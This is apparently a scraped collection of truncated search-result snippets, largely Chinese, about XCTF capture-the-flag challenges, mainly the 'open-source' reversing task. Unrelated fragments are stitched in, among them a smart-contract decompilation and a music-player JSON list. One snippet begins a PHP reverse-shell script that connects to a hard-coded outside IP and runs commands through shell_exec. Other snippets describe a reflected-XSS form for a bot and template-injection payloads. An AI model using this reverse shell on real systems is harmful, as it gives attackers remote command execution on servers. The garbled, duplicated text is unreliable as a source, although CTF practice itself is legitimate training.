XCTF-open-source 下载附件拿到源码。 #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsigned int first = atoi(argv[1]); if (first != 0xcafe) { printf("you are wrong, sorry.\n"); exit(2);...
xctf-open-source 这题给了源码,直接IDE打开即可, 很容易就能看出hash就是要求的答案,为了执行到最后一步,就不能执行前面所有的if语句,依次可得first=0xcafe,second%17=8,argv[3]=""h4cky0u",把hash的赋值里的first,second%17和argv[3]全部替换掉,然后把前面的代码全删了直接运行就得到flag 最后的flag是c0f...
根据view_source协议的知识得,在url前添加它即可。事实上直接fn+f12即可直接查看网页源码,得出的结果也是一样的。Web_python_template_injection 题目描述 进入题目场景,知道为模板注入 解题通常有2种解法,手工注入和借助kali里的tqlmap脚本注入 手工注入:1.测试注入:(有回显说明存在漏洞)payload:http://111....
# Let's make the world open source #consteth_balance=eth.balance(this.address)def storage:stor0 is addr at storage0stor1 is addr at storage1balanceOf is mappingofuint256 at storage2stor3 is mappingofuint8 at storage3unknown35983396 is mappingofuint256 at storage4defunknown35983396(addr _pa...
php$ip='174.137.58.6';// 改为攻击者的 IP 地址$port=6666;// 改为攻击者监听的端口// 创建一个 socket 连接到攻击者的机器$socket=fsockopen($ip,$port);if($socket){// 通过 shell_exec 执行系统命令并将输出发送到 socketwhile($cmd=fgets($socket,1024)){$cmd=trim($cmd);// 去除命令末尾的...
view-source:http://seafaring.xctf.org.cn:9999/admin/可以发现后台一些api和参数 handle_message.php 存在反射型XSS bot使用的是firefox浏览器 于是构造html让bot访问 <html> <script> window.onload =function(){ document.getElementById("f").submit(); ...
"cover_art_url": "https://521dimensions.com/img/open-source/amplitudejs/album-art/die-digital.jpg" }, { "name": "Offcut #6", "artist": "Little People", "album": "We Are But Hunks of Wood Remixes", "url": "https://521dimensions.com/song/Offcut6-LittlePeople.mp3", "cover_ar...
xctf新手逆向训练题 这两天在工作之余刷了下xctf的逆向新手题 0x1 open-source 下载文件后可以直接看源码 要求是输入4个参数,第一个参数为’0xcafe’,第二个参数是符合判定条件的int值,第三个参数是’h4cky0u’,然后进行一些数据操作得到hash,并用十六进制方式输出(%x) 编写脚本实现,得到flag为0xc0ffee... ...
xctf新手逆向训练题 这两天在工作之余刷了下xctf的逆向新手题 0x1 open-source 下载文件后可以直接看源码 要求是输入4个参数,第一个参数为’0xcafe’,第二个参数是符合判定条件的int值,第三个参数是’h4cky0u’,然后进行一些数据操作得到hash,并用十六进制方式输出(%x) 编写脚本实现,得到flag为0xc0ffee... ...
第九题:open - source 第十题:no-strings-attached 法一:动态分析 0x01.查壳和查看程序的详细信息 0x02.使用静态分析工具IDA进行分析 setlocale banner() prompt_authentication(); authenticate() 0x03.GDB动态调试 法二:静态分析 第十一题 :csaw2013reversing2 0x01:查壳 0x02: 思路一:静态分析 main函数的...